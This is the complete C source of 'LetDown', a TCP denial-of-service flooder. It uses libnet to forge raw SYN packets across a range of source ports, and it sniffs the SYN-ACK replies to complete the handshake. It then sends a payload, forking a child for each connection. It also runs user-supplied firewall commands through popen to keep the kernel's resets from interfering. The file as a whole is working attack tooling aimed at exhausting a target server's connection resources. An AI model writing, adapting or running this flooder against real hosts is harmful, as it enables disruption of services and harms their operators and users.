/*
 * LetDown, tcp dos flooder. Raw 3 way handshake...
 * See http://insecure.org/stf/tcp-dos-attack-explained.html
 *
 * Copyright (C) 2008  Acri Emanuele <crossbower@gmail.com>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include "letdown.h"

#include <signal.h>
#include <stdint.h>
#include <libnet.h>
#include <sys/socket.h>

#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>


#define PKT_LEN 8192


struct options progopt; // options struct

/*
 * IP header
 */
struct iphead
{
#if __BYTE_ORDER == __LITTLE_ENDIAN
    unsigned int ihl:4;
    unsigned int version:4;
#elif __BYTE_ORDER == __BIG_ENDIAN
    unsigned int version:4;
    unsigned int ihl:4;
#else
# error "Please fix <bits/endian.h>"
#endif
    u_int8_t tos;
    u_int16_t tot_len;
    u_int16_t id;
    u_int16_t frag_off;
    u_int8_t ttl;
    u_int8_t protocol;
    u_int16_t check;
    u_int32_t saddr;
    u_int32_t daddr;
    /*The options start here. */
};


/*
 * TCP header
 */
struct tcphead
{
    u_int16_t source;
    u_int16_t dest;
    u_int32_t seq;
    u_int32_t ack_seq;
#  if __BYTE_ORDER == __LITTLE_ENDIAN
    u_int16_t res1:4;
    u_int16_t doff:4;
    u_int16_t fin:1;
    u_int16_t syn:1;
    u_int16_t rst:1;
    u_int16_t psh:1;
    u_int16_t ack:1;
    u_int16_t urg:1;
    u_int16_t res2:2;
#  elif __BYTE_ORDER == __BIG_ENDIAN
    u_int16_t doff:4;
    u_int16_t res1:4;
    u_int16_t res2:2;
    u_int16_t urg:1;
    u_int16_t ack:1;
    u_int16_t psh:1;
    u_int16_t rst:1;
    u_int16_t syn:1;
    u_int16_t fin:1;
#  else
#   error "Adjust your <bits/endian.h> defines"
#  endif
    u_int16_t window;
    u_int16_t check;
    u_int16_t urg_ptr;
};

/*
 * Enable firewall rule
 */
void firewall_on(struct options *opt)
{	
	FILE *p;
	
	p = popen(opt->firewall[0], "r");
	pclose(p);
}

/*
 * Disable firewall rule
 */
void firewall_off(struct options *opt)
{
	FILE *p;
	
	p = popen(opt->firewall[1], "r");
	pclose(p);
}

/*
 * Destructor and signal handler
 */
void pre_exit()
{
    fprintf(stderr, "Exiting...\n");
    
	firewall_off(&progopt);
	
	exit(0);
}

/*
 * SIG_ALRM handler
 */
void catch_alarm()
{
    exit(0);
}

/*
 * Flooding loop function
 */
void floodloop(struct options *opt)
{
    int c, ipid=0;
    char *cp;
    char *payload;

    u_int16_t src_prt = 0;
    u_int16_t start_prt = opt->xport;
    u_int16_t end_prt = opt->yport;
    u_int16_t dst_prt = opt->dport;
    
   	struct iphead *ip;
	struct tcphead *tcp;
	
	int sd;
	char buffer[PKT_LEN];
	
	libnet_t *l;  // the libnet context
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_ptag_t ptagip, ptagtcp;
    
    u_int32_t src_ip, dst_ip;
    
    // initialize libnet
    l = libnet_init(LIBNET_RAW4, opt->device[0]!='\0' ? opt->device : NULL, errbuf);
    if ( l == NULL ) {
        fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
        exit(EXIT_FAILURE);
    }

    // check destination ip
    dst_ip = libnet_name2addr4(l, opt->dstaddr, LIBNET_DONT_RESOLVE);
    if(!dst_ip) {
        fprintf(stderr, "Destination address error.\n");
        exit(EXIT_FAILURE);
    }
    
    // check source ip
    if(opt->srcaddr[0]!='\0') {
        src_ip = libnet_name2addr4(l, opt->srcaddr, LIBNET_DONT_RESOLVE);
        if(!src_ip) {
            fprintf(stderr, "Source address error.\n", libnet_geterror(l));
            exit(EXIT_FAILURE);
        }
    }
    else {
        src_ip = libnet_get_ipaddr4(l);
        if(!src_ip) {
            fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
            exit(EXIT_FAILURE);
        }
    }

    // inizialize socket for sniffing    
    sd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
	if (sd < 0) {
		perror("Socket error");
		exit(0);
	}

    // flooding loop
    for(src_prt=start_prt; src_prt<=end_prt; src_prt++) {
        
        // sleep
        usleep(opt->time);
        
        // clear buffer
        memset(buffer, 0, PKT_LEN);
        
        /* child process */
        if(fork()==0) {
            
            alarm(opt->alarm); //set timer
            
            /* Send SYN */
            
            // build tcp
            ptagtcp = libnet_build_tcp(
                src_prt,              /* source TCP port */
                dst_prt,              /* destination TCP port */
                htonl(0)+1,           /* sequence number */
                htonl(0)+1,           /* acknowledgement number */
                TH_SYN,               /* control flags */
                1024,                 /* window size */
                0,                    /* checksum */
                0,                    /* urgent pointer */
                LIBNET_TCP_H,         /* total length */
                NULL,                 /* payload */
                0,                    /* payload length */
                l,                    /* libnet context */
                0                     /* build new header */
            );
            
            // build ip
            ptagip = libnet_build_ipv4 (
                LIBNET_IPV4_H + LIBNET_TCP_H, /* size of the packet */
                IPTOS_LOWDELAY,               /* IP tos */
                ipid++,                       /* IP ID */
                0,                            /* frag stuff */
                128,                          /* TTL */
                IPPROTO_TCP,                  /* transport protocol */
                0,                            /* checksum */
                src_ip,                       /* source IP */
                dst_ip,                       /* destination IP */
                NULL,                         /* payload */
                0,                            /* payload length */
                l,                            /* libnet context */
                0                             /* build new header */
            );
            
            // packet injection
            if(libnet_write(l) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
            
            // clear
            libnet_clear_packet(l);
            
            // sniff for syn-ack reply
        	while(read(sd, buffer, 8192) > 0){
	            ip = (struct iphead *) buffer;
	            tcp = (struct tcphead *) (buffer + ip->ihl*4);
	
	            // if found...
	            if(ip->saddr == inet_addr(opt->dstaddr) && ip->daddr == inet_addr(opt->srcaddr)) {
		            if(tcp->syn && tcp->ack && tcp->source==htons(dst_prt)) {
                        
                        /* Send ACK */
                        
                        // build tcp
                        libnet_build_tcp(
                            src_prt,              /* source TCP port */
                            dst_prt,              /* destination TCP port */
                            2,                    /* sequence number */
                            ntohl(tcp->seq)+1,    /* acknowledgement number */
                            TH_ACK,               /* control flags */
                            1024,                 /* window size */
                            0,                    /* checksum */
                            0,                    /* urgent pointer */
                            LIBNET_TCP_H,         /* total length */
                            NULL,                 /* payload */
                            0,                    /* payload length */
                            l,                    /* libnet context */
                            0               /* build new header */
                        );
                        
                        // build ip
                        libnet_build_ipv4 (
                            LIBNET_IPV4_H + LIBNET_TCP_H, /* size of the packet */
                            IPTOS_LOWDELAY,               /* IP tos */
                            ipid++,                       /* IP ID */
                            0,                            /* frag stuff */
                            128,                          /* TTL */
                            IPPROTO_TCP,                  /* transport protocol */
                            0,                            /* checksum */
                            src_ip,                       /* source IP */
                            dst_ip,                       /* destination IP */
                            NULL,                         /* payload */
                            0,                            /* payload length */
                            l,                            /* libnet context */
                            0                        /* build new header */
                        );
                        
                        // packet injection
                        if(libnet_write(l) == -1) {
                            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                            exit(EXIT_FAILURE);
                        }
                        
                        // clear
                        libnet_clear_packet(l);
               
                        /* Send PAYLOAD */
                            
                        // build tcp
                        libnet_build_tcp(
                            src_prt,              /* source TCP port */
                            dst_prt,              /* destination TCP port */
                            2,                    /* sequence number */
                            ntohl(tcp->seq)+1,    /* acknowledgement number */
                            TH_ACK,               /* control flags */
                            1024,                 /* window size */
                            0,                    /* checksum */
                            0,                    /* urgent pointer */
                            LIBNET_TCP_H +
                            (opt->payload[0]!='\0' ? strlen(opt->payload) : 0), /* total length */
                            (opt->payload[0]!='\0' ? opt->payload : NULL), /* payload */
                            (opt->payload[0]!='\0' ? strlen(opt->payload) : 0), /* payload length */
                            l,                    /* libnet context */
                            0               /* build new header */
                        );
                        
                        // build ip
                        libnet_build_ipv4 (
                            LIBNET_IPV4_H + LIBNET_TCP_H +
                            (opt->payload[0]!='\0' ? strlen(opt->payload) : 0), /* size of the packet */
                            IPTOS_LOWDELAY,               /* IP tos */
                            ipid++,                       /* IP ID */
                            0,                            /* frag stuff */
                            128,                          /* TTL */
                            IPPROTO_TCP,                  /* transport protocol */
                            0,                            /* checksum */
                            src_ip,                       /* source IP */
                            dst_ip,                       /* destination IP */
                            NULL,                         /* payload */
                            0,                            /* payload length */
                            l,                            /* libnet context */
                            0                        /* build new header */
                        );
                        
                        // packet injection
                        if(libnet_write(l) == -1) {
                            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                            exit(EXIT_FAILURE);
                        }
			            
			            exit(0);
		            }
	            }
            }
            
            exit(0);
        }
        
        /* daddy process */
        else {
            wait(0);
        }
    }
    
    // close libnet
    libnet_destroy(l);
}

/*
 * Program init
 */
int main(int argc, char **argv)
{
        // Establish a handler for signals
        signal (SIGALRM, catch_alarm);
        signal (SIGTERM, pre_exit);
        signal (SIGKILL, pre_exit);
        
        // Fill options struct
        parseopt(&progopt, argc, argv);
        
        // Firewall rule on
        if(progopt.firewall[0])
            firewall_on(&progopt);
        
        // Flooding loop
        floodloop(&progopt);
        
        // Firewall rule off
        if(progopt.firewall[1])
            firewall_off(&progopt);
}

